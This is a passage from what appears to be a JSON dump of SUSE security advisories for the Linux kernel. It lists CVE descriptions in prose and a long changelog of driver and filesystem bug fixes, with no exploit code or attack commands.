(bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - Revert "tty: goldfish: Fix a parameter of a call to free_irq"\n (bnc#1012382).\n - rtlwifi: rtl8821ae: Fix connection lost problem (bnc#1012382).\n - sched/autogroup: Fix autogroup_move_group() to never skip\n sched_move_task() (bnc#1012382).\n - sched/cpuset/pm: Fix cpuset vs. suspend-resume bugs (bnc#1012382).\n - scsi: hpsa: add 'ctlr_num' sysfs attribute (bsc#1028971).\n - scsi: hpsa: bump driver version (bsc#1022600 fate#321928).\n - scsi: hpsa: change driver version (bsc#1022600 bsc#1028971 fate#321928).\n - scsi: hpsa: Check for null device pointers (bsc#1028971).\n - scsi: hpsa: Check for null devices in ioaccel (bsc#1028971).\n - scsi: hpsa: Check for vpd support before sending (bsc#1028971).\n - scsi: hpsa: cleanup reset handler (bsc#1022600 fate#321928).\n - scsi: hpsa: correct call to hpsa_do_reset (bsc#1028971).\n - scsi: hpsa: correct logical resets (bsc#1028971).\n - scsi: hpsa: correct queue depth for externals (bsc#1022600 fate#321928).\n - scsi: hpsa: correct resets on retried commands (bsc#1022600 fate#321928).\n - scsi: hpsa: correct scsi 6byte lba calculation (bsc#1028971).\n - scsi: hpsa: Determine device external status earlier (bsc#1028971).\n - scsi: hpsa: do not get enclosure info for external devices (bsc#1022600\n fate#321928).\n - scsi: hpsa: do not reset enclosures (bsc#1022600 fate#321928).\n - scsi: hpsa: do not timeout reset operations (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: fallback to use legacy REPORT PHYS command (bsc#1028971).\n - scsi: hpsa: fix volume offline state (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: limit outstanding rescans (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: Prevent sending bmic commands to externals (bsc#1028971).\n - scsi: hpsa: remove abort handler (bsc#1022600 fate#321928).\n - scsi: hpsa: remove coalescing settings for ioaccel2 (bsc#1028971).\n - scsi: hpsa: remove memory allocate failure message (bsc#1028971).\n - scsi: hpsa: Remove unneeded void pointer cast (bsc#1028971).\n - scsi: hpsa: rescan later if reset in progress (bsc#1022600 fate#321928).\n - scsi: hpsa: send ioaccel requests with 0 length down raid path\n (bsc#1022600 fate#321928).\n - scsi: hpsa: separate monitor events from rescan worker (bsc#1022600\n fate#321928).\n - scsi: hpsa: update check for logical volume status (bsc#1022600\n bsc#1028971 fate#321928).\n - scsi: hpsa: update identify physical device structure (bsc#1022600\n fate#321928).\n - scsi: hpsa: update pci ids (bsc#1022600 bsc#1028971 fate#321928).\n - scsi: hpsa: update reset handler (bsc#1022600 fate#321928).\n - scsi: hpsa: use designated initializers (bsc#1028971).\n - scsi: hpsa: use %phN for short hex dumps (bsc#1028971).\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure (bsc#1059465).\n - scsi: libfc: fix a deadlock in fc_rport_work (bsc#1063695).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: reset wait for IO completion (bsc#996376).\n - scsi: scsi_dh_emc: return success in clariion_std_inquiry()\n (bnc#1012382).\n - scsi: scsi_transport_fc: Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n - scsi: scsi_transport_fc: set scsi_target_id upon rescan (bsc#1058135).\n - scsi: sd: Do not override max_sectors_kb sysfs setting (bsc#1025461).\n - scsi: sd: Remove LBPRZ dependency for discards (bsc#1060985).\n - scsi: sg: close race condition in sg_remove_sfp_usercontext()\n (bsc#1064206).\n - scsi: sg: do not return bogus Sg_requests (bsc#1064206).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: only check for dxfer_len greater than 256M (bsc#1064206).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - sctp: potential read out of bounds in sctp_ulpevent_type_enabled()\n (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - sh_eth: use correct name for ECMR_MPDE bit (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - slub: do not merge cache if slub_debug contains a never-merge flag\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - sparc64: Migrate hvcons irq to panicked cpu (bnc#1012382).\n - staging: iio: ad7192: Fix - use the dedicated reset function avoiding\n dma from stack (bnc#1012382).\n - stm class: Fix a use-after-free (bnc#1012382).\n - supported.conf: mark hid-multitouch as supported (FATE#323670)\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - target/iscsi: Fix unsolicited data seq_end_offset calculation\n (bnc#1012382).\n - team: call netdev_change_features out of team lock (bsc#1055567).\n - team: fix memory leaks (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tipc: use only positive error codes in messages (bnc#1012382).\n - tpm_tis: Do not fall back to a hardcoded address for TPM2 (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - ttpci: address stringop overflow warning (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: goldfish: Fix a parameter of a call to free_irq (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - tun: bail out from tun_get_user() if the skb is empty (bnc#1012382).\n - uapi: fix linux/mroute6.h userspace compilation errors (bnc#1012382).\n - uapi: fix linux/rds.h userspace compilation errors (bnc#1012382).\n - udpv6: Fix the checksum computation when HW checksum does not apply\n (bnc#1012382).\n - usb: cdc_acm: Add quirk for Elatec TWN3 (bnc#1012382).\n - usb: chipidea: vbus event may exist before starting gadget (bnc#1012382).\n - usb: core: fix out-of-bounds access bug in usb_get_bos_descriptor()\n (bnc#1012382).\n - usb: core: harden cdc_parse_cdc_header (bnc#1012382).\n - usb: devio: Do not corrupt user memory (bnc#1012382).\n - usb: devio: Revert "USB: devio: Do not corrupt user memory"\n (bnc#1012382).\n - usb: dummy-hcd: fix connection failures (wrong speed) (bnc#1012382).\n - usb: dummy-hcd: Fix deadlock caused by disconnect detection\n (bnc#1012382).\n - usb: dummy-hcd: Fix erroneous synchronization change (bnc#1012382).\n - usb: dummy-hcd: fix infinite-loop resubmission bug (bnc#1012382).\n - usb: fix out-of-bounds in usb_set_configuration (bnc#1012382).\n - usb: gadget: composite: Fix use-after-free in\n usb_composite_overwrite_options (bnc#1012382).\n - usb: gadgetfs: fix copy_to_user while holding spinlock (bnc#1012382).\n - usb: gadgetfs: Fix crash caused by inadequate synchronization\n (bnc#1012382).\n - usb: gadget: inode.c: fix unbalanced spin_lock in ep0_write\n (bnc#1012382).\n - usb: gadget: mass_storage: set msg_registered after msg registered\n (bnc#1012382).\n - usb: gadget: udc: atmel: set vbus irqflags explicitly (bnc#1012382).\n - usb: g_mass_storage: Fix deadlock when driver is unbound (bnc#1012382).\n - usb: hub: Allow reset retry for USB2 devices on connect bounce\n (bnc#1012382).\n - usb: Increase quirk delay for USB devices (bnc#1012382).\n - usb: musb: Check for host-mode using is_host_active() on reset interrupt\n (bnc#1012382).\n - usb: musb: sunxi: Explicitly release USB PHY on exit (bnc#1012382).\n - usb: pci-quirks.c: Corrected timeout values used in handshake\n (bnc#1012382).\n - usb: plusb: Add support for PL-27A1 (bnc#1012382).\n - usb: quirks: add quirk for WORLDE MINI MIDI keyboard (bnc#1012382).\n - usb: renesas_usbhs: Fix DMAC sequence for receiving zero-length packet\n (bnc#1012382).\n - usb: renesas_usbhs: fix the BCLR setting condition for non-DCP pipe\n (bnc#1012382).\n - usb: renesas_usbhs: fix usbhsf_fifo_clear() for RX direction\n (bnc#1012382).\n - usb: serial: console: fix use-after-free after failed setup\n (bnc#1012382).\n - usb: serial: cp210x: add support for ELV TFD500 (bnc#1012382).\n - usb: serial: ftdi_sio: add id for Cypress WICED dev board (bnc#1012382).\n - usb: serial: metro-usb: add MS7820 device id (bnc#1012382).\n - usb: serial: mos7720: fix control-message error handling (bnc#1012382).\n - usb: serial: mos7840: fix control-message error handling (bnc#1012382).\n - usb: serial: option: add support for TP-Link LTE module (bnc#1012382).\n - usb: serial: qcserial: add Dell DW5818, DW5819 (bnc#1012382).\n - usb-storage: unusual_devs entry to fix write-access regression for\n Seagate external drives (bnc#1012382).\n - usb: uas: fix bug in handling of alternate settings (bnc#1012382).\n - uwb: ensure that endpoint is interrupt (bnc#1012382).\n - uwb: properly check kthread_run return value (bnc#1012382).\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - vti: fix use after free in vti_tunnel_xmit/vti6_tnl_xmit (bnc#1012382).\n - watchdog: kempld: fix gcc-4.3 build (bnc#1012382).\n - x86/alternatives: Fix alt_max_short macro to really be a max()\n (bnc#1012382).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - xfs/dmapi: fix incorrect file->f_path.dentry->d_inode usage\n (bsc#1055896).\n - xfs: handle error if xfs_btree_get_bufs fails (bsc#1059863).\n - xfs: remove kmem_zalloc_greedy (bnc#1012382).\n - xhci: fix finding correct bus_state structure for USB 3.1 hosts\n (bnc#1012382).\n\n", "edition": 1, "modified": "2017-12-12T15:07:51", "published": "2017-12-12T15:07:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00027.html", "id": "SUSE-SU-2017:3267-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-27T20:32:02", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-13080", "CVE-2017-14489", "CVE-2017-7518", "CVE-2017-15649", "CVE-2017-1000252", "CVE-2017-11472", "CVE-2017-8831", "CVE-2017-10810", "CVE-2017-14106", "CVE-2017-11473", "CVE-2017-7541", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-6346", "CVE-2017-7542", "CVE-2017-12154"], "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.90 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n - CVE-2017-10810: Memory leak in the virtio_gpu_object_create function in\n drivers/gpu/drm/virtio/virtgpu_object.c in the Linux kernel allowed\n attackers to cause a denial of service (memory consumption) by\n triggering object-initialization failures (bnc#1047277).\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did not flush the\n operand cache and causes a kernel stack dump, which allowed local users\n to obtain sensitive information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a crafted ACPI\n table (bnc#1049580).\n - CVE-2017-11473: Buffer overflow in the mp_override_legacy_irq() function\n in arch/x86/kernel/acpi/boot.c in the Linux kernel allowed local users\n to gain privileges via a crafted ACPI table (bnc#1049603).\n - CVE-2017-12134: The xen_biovec_phys_mergeable function in\n drivers/xen/biomerge.c in Xen might allow local OS guest users to\n corrupt block device data streams and consequently obtain sensitive\n memory information, cause a denial of service, or gain host OS\n privileges by leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 bnc#1053919).\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the "CR8-load exiting" and "CR8-store\n exiting" L0 vmcs02 controls exist in cases where L1 omits the "use TPR\n shadow" vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel allowed local users\n to cause a denial of service (memory corruption and system crash) by\n leveraging root access (bnc#1056588).\n - CVE-2017-14106: The tcp_disconnect function in net/ipv4/tcp.c in the\n Linux kernel allowed local users to cause a denial of service\n (__tcp_select_window divide-by-zero error and system crash) by\n triggering a disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n - CVE-2017-7518: The Linux kernel was vulnerable to an incorrect debug\n exception(#DB) error. It could occur while emulating a syscall\n instruction and potentially lead to guest privilege escalation.\n (bsc#1045922).\n - CVE-2017-7541: The brcmf_cfg80211_mgmt_tx function in\n drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c in the Linux\n kernel allowed local users to cause a denial of service (buffer overflow\n and system crash) or possibly gain privileges via a crafted\n NL80211_CMD_FRAME Netlink packet (bnc#1049645).\n - CVE-2017-7542: The ip6_find_1stfragopt function in\n net/ipv6/output_core.c in the Linux kernel allowed local users to cause\n a denial of service (integer overflow and infinite loop) by leveraging\n the ability to open a raw socket (bnc#1049882).\n - CVE-2017-8831: The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds array access) or\n possibly have unspecified other impact by changing a certain\n sequence-number value, aka a "double fetch" vulnerability (bnc#1037994).\n\n The following non-security bugs were fixed:\n\n - acpi / processor: Avoid reserving IO regions too early (bsc#1051478).\n - acpi / scan: Prefer devices without _HID for _ADR matching (git-fixes).\n - af_key: Add lock to key dump (bsc#1047653).\n - af_key: Fix slab-out-of-bounds in pfkey_compile_policy (bsc#1047354).\n - alsa: fm801: Initialize chip after IRQ handler is registered\n (bsc#1031717).\n - alsa: hda - Add stereo mic quirk for Lenovo G50-70 (17aa:3978)\n (bsc#1020657).\n - alsa: hda - Fix endless loop of codec configure (bsc#1031717).\n - alsa: hda - Implement mic-mute LED mode enum (bsc#1055013).\n - alsa: hda/realtek - Add support headphone Mic for ALC221 of HP platform\n (bsc#1024405).\n - alsa: hda - set input_path bitmap to zero after moving it to new place\n (bsc#1031717).\n - alsa: ice1712: Add support for STAudio ADCIII (bsc#1048934).\n - alsa: usb-audio: Apply sample rate quirk to Sennheiser headset\n (bsc#1052580).\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - b43: Add missing MODULE_FIRMWARE() (bsc#1037344).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: force trigger gc (bsc#1038078).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n - bdi: Fix use-after-free in wb_congested_put() (bsc#1040307).\n - blacklist 2400fd822f46 powerpc/asm: Mark cr0 as clobbered in mftb()\n - blacklist.conf: 9eeacd3a2f17 not a bug fix (bnc#1050061)\n - blacklist.conf: add unapplicable/cosmetic iwlwifi fixes (bsc#1031717).\n - blacklist.conf: add unapplicable drm fixes (bsc#1031717).\n - blacklist.conf: Blacklist 4e201566402c ('genirq/msi: Drop artificial PCI\n dependency') (bsc#1051478) This commit just removes an include and does\n not fix a real issue.\n - blacklist.conf: Blacklist aa2369f11ff7 ('mm/gup.c: fix access_ok()\n argument type') (bsc#1051478) Fixes only a compile-warning.\n - blacklist.conf: Blacklist c133c7615751 ('x86/nmi: Fix timeout test in\n test_nmi_ipi()') It only fixes a self-test (bsc#1051478).\n - blacklist.conf: Blacklist c9525a3fab63 ('x86/watchdog: Fix Kconfig help\n text file path reference to lockup watchdog documentation') Updates only\n kconfig help-text (bsc#1051478).\n - blacklist.conf: Blacklist e80e7edc55ba ('PCI/MSI: Initialize MSI\n capability for all architectures') This only fixes machines not\n supported by our kernels.\n - blkfront: add uevent for size change (bnc#1036632).\n - block: Allow bdi re-registration (bsc#1040307).\n - block: do not allow updates through sysfs until registration completes\n (bsc#1047027).\n - block: Fix front merge check (bsc#1051239).\n - block: Make del_gendisk() safer for disks without queues (bsc#1040307).\n - block: Move bdi_unregister() to del_gendisk() (bsc#1040307).\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bluetooth: bnep: fix possible might sleep error in bnep_session\n (bsc#1031784).\n - bluetooth: cmtp: fix possible might sleep error in cmtp_session\n (bsc#1031784).\n - bluetooth: hidp: fix possible might sleep error in hidp_session_thread\n (bsc#1031784).\n - bnxt: add a missing rcu synchronization (bnc#1038583).\n - bnxt: do not busy-poll when link is down (bnc#1038583).\n - bnxt_en: Enable MRU enables bit when configuring VNIC MRU (bnc#1038583).\n - bnxt_en: Fix and clarify link_info->advertising (bnc#1038583).\n - bnxt_en: Fix a VXLAN vs GENEVE issue (bnc#1038583).\n - bnxt_en: Fix NULL pointer dereference in a failure path during open\n (bnc#1038583).\n - bnxt_en: Fix NULL pointer dereference in reopen failure path\n (bnc#1038583).\n - bnxt_en: fix pci cleanup in bnxt_init_one() failure path (bnc#1038583).\n - bnxt_en: Fix ring arithmetic in bnxt_setup_tc() (bnc#1038583).\n - bnxt_en: Fix TX push operation on ARM64 (bnc#1038583).\n - bnxt_en: Fix "uninitialized variable" bug in TPA code path (bnc#1038583).\n - bnxt_en: Fix VF virtual link state (bnc#1038583).\n - bnxt_en: initialize rc to zero to avoid returning garbage (bnc#1038583).\n - bnxt_en: Pad TX packets below 52 bytes (bnc#1038583).\n - bnxt_en: Refactor TPA code path (bnc#1038583).\n - brcmfmac: Fix glom_skb leak in brcmf_sdiod_recv_chain (bsc#1031717).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: add cond_resched to btrfs_qgroup_trace_leaf_items (bsc#1028286).\n - btrfs: Add WARN_ON for qgroup reserved underflow (bsc#1031515).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - btrfs: fix early ENOSPC due to delalloc (bsc#1049226).\n - btrfs: fix lockup in find_free_extent with read-only block groups\n (bsc#1046682).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: incremental send, fix invalid path for link commands\n (bsc#1051479).\n - btrfs: incremental send, fix invalid path for unlink commands\n (bsc#1051479).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - btrfs: resume qgroup rescan on rw remount (bsc#1047152).\n - btrfs: send, fix invalid path after renaming and linking file\n (bsc#1051479).\n - ceph: fix readpage from fscache (bsc#1057015).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - class: Add "shutdown" to "struct class" (bsc#1053117).\n - cpuidle: dt: Add missing 'of_node_put()' (bnc#1022476).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: s5p-sss - fix incorrect usage of scatterlists api (bsc#1048317).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - cx82310_eth: use skb_cow_head() to deal with cloned skbs (bsc# 1045154).\n - cxgb4: Fix stack out-of-bounds read due to wrong size to\n t4_record_mbox() (bsc#1021424 bsc#1022743).\n - cxl: Fix driver use count (bnc#1012382).\n - cxl: Unlock on error in probe (bsc#1034762, Pending SUSE Kernel Fixes).\n - dentry name snapshots (bsc#1049483).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - dm: fix second blk_delay_queue() parameter to be in msec units not\n (bsc#1047670).\n - drivers: hv: Fix the bug in generating the guest ID (fate#320485).\n - drivers: hv: util: Fix a typo (fate#320485).\n - drivers: hv: vmbus: Get the current time from the current clocksource\n (fate#320485, bnc#1044112, bnc#1042778, bnc#1029693).\n - drivers: hv: vmbus: Increase the time between retries in\n vmbus_post_msg() (fate#320485, bnc#1044112).\n - drivers: hv: vmbus: Move the code to signal end of message (fate#320485).\n - drivers: hv: vmbus: Move the definition of generate_guest_id()\n (fate#320485).\n - drivers: hv: vmbus: Move the definition of hv_x64_msr_hypercall_contents\n (fate#320485).\n - drivers: hv: vmbus: Restructure the clockevents code (fate#320485).\n - drivers: net: xgene: Fix wrong logical operation (bsc#1056827).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/amdgpu: Fix overflow of watermark calcs at > 4k resolutions\n (bsc#1031717).\n - drm/bochs: Implement nomodeset (bsc#1047096).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - drm/i915/fbdev: Stop repeating tile configuration on stagnation\n (bsc#1031717).\n - drm/i915: Fix scaler init during CRTC HW state readout (bsc#1031717).\n - drm/i915: Serialize GTT/Aperture accesses on BXT (bsc#1046821).\n - drm/virtio: do not leak bo on drm_gem_object_init failure (bsc#1047277).\n - drm/vmwgfx: Fix large topology crash (bsc#1048155).\n - drm/vmwgfx: Limit max desktop dimensions to 8Kx8K (bsc#1048155).\n - drm/vmwgfx: Support topology greater than texture size (bsc#1048155).\n - efi/libstub: Skip GOP with PIXEL_BLT_ONLY format (bnc#974215).\n - ext2: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ext4: avoid unnecessary stalls in ext4_evict_inode() (bsc#1049486).\n - ext4: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - ext4: handle the rest of ext4_mb_load_buddy() ENOMEM errors\n (bsc#1012829).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - fs/fcntl: f_setown, avoid undefined behaviour (bnc#1006180).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - fuse: initialize the flock flag in fuse_file on allocation (git-fixes).\n - gcov: add support for gcc version >= 6 (bsc#1051663).\n - gcov: support GCC 7.1 (bsc#1051663).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Do not clear SGID when inheriting ACLs (bsc#1012829).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gfs2: fix flock panic issue (bsc#1012829).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - hrtimer: Catch invalid clockids again (bsc#1047651).\n - hrtimer: Revert CLOCK_MONOTONIC_RAW support (bsc#1047651).\n - hv_utils: drop .getcrosststamp() support from PTP driver (fate#320485,\n bnc#1044112, bnc#1042778, bnc#1029693).\n - hv_utils: fix TimeSync work on pre-TimeSync-v4 hosts (fate#320485,\n bnc#1044112, bnc#1042778, bnc#1029693).\n - hv_util: switch to using timespec64 (fate#320485).\n - i2c: designware-baytrail: fix potential null pointer dereference on dev\n (bsc#1011913).\n - i40e: add hw struct local variable (bsc#1039915).\n - i40e: add private flag to control source pruning (bsc#1034075).\n - i40e: add VSI info to macaddr messages (bsc#1039915).\n - i40e: avoid looping to check whether we're in VLAN mode (bsc#1039915).\n - i40e: avoid O(n^2) loop when deleting all filters (bsc#1039915).\n - i40e: delete filter after adding its replacement when converting\n (bsc#1039915).\n - i40e: do not add broadcast filter for VFs (bsc#1039915).\n - i40e: do not allow i40e_vsi_(add|kill)_vlan to operate when VID<1\n (bsc#1039915).\n - i40e: drop is_vf and is_netdev fields in struct i40e_mac_filter\n (bsc#1039915).\n - i40e: enable VSI broadcast promiscuous mode instead of adding broadcast\n filter (bsc#1039915).\n - i40e: factor out addition/deletion of VLAN per each MAC address\n (bsc#1039915).\n - i40e: fix MAC filters when removing VLANs (bsc#1039915).\n - i40e: fold the i40e_is_vsi_in_vlan check into i40e_put_mac_in_vlan\n (bsc#1039915).\n - i40e: implement __i40e_del_filter and use where applicable (bsc#1039915).\n - i40e: make use of __dev_uc_sync and __dev_mc_sync (bsc#1039915).\n - i40e: move all updates for VLAN mode into i40e_sync_vsi_filters\n (bsc#1039915).\n - i40e: move i40e_put_mac_in_vlan and i40e_del_mac_all_vlan (bsc#1039915).\n - i40e: no need to check is_vsi_in_vlan before calling\n i40e_del_mac_all_vlan (bsc#1039915).\n - i40e: properly cleanup on allocation failure in i40e_sync_vsi_filters\n (bsc#1039915).\n - i40e: recalculate vsi->active_filters from hash contents (bsc#1039915).\n - i40e: refactor i40e_put_mac_in_vlan to avoid changing f->vlan\n (bsc#1039915).\n - i40e: refactor i40e_update_filter_state to avoid passing aq_err\n (bsc#1039915).\n - i40e: refactor Rx filter handling (bsc#1039915).\n - i40e: Removal of workaround for simple MAC address filter deletion\n (bsc#1039915).\n - i40e: remove code to handle dev_addr specially (bsc#1039915).\n - i40e: removed unreachable code (bsc#1039915).\n - i40e: remove duplicate add/delete adminq command code for filters\n (bsc#1039915).\n - i40e: remove second check of VLAN_N_VID in i40e_vlan_rx_add_vid\n (bsc#1039915).\n - i40e: rename i40e_put_mac_in_vlan and i40e_del_mac_all_vlan\n (bsc#1039915).\n - i40e: restore workaround for removing default MAC filter (bsc#1039915).\n - i40e: set broadcast promiscuous mode for each active VLAN (bsc#1039915).\n - i40e: store MAC/VLAN filters in a hash with the MAC Address as key\n (bsc#1039915).\n - i40e: use (add|rm)_vlan_all_mac helper functions when changing PVID\n (bsc#1039915).\n - i40e: when adding or removing MAC filters, correctly handle VLANs\n (bsc#1039915).\n - i40e: When searching all MAC/VLAN filters, ignore removed filters\n (bsc#1039915).\n - i40e: write HENA for VFs (bsc#1039915).\n - ib/hfi1: Wait for QSFP modules to initialize (bsc#1019151).\n - ibmvnic: Check for transport event on driver resume (bsc#1051556,\n bsc#1052709).\n - ibmvnic: Clean up resources on probe failure (fate#323285, bsc#1058116).\n - ibmvnic: Initialize SCRQ's during login renegotiation (bsc#1052223).\n - ibmvnic: Report rx buffer return codes as netdev_dbg (bsc#1052794).\n - iio: hid-sensor: fix return of -EINVAL on invalid values in ret or value\n (bsc#1031717).\n - input: gpio-keys - fix check for disabling unsupported keys\n (bsc#1031717).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - introduce the walk_process_tree() helper (bnc#1022476).\n - iommu/amd: Fix schedule-while-atomic BUG in initialization code\n (bsc1052533).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ipv4: Should use 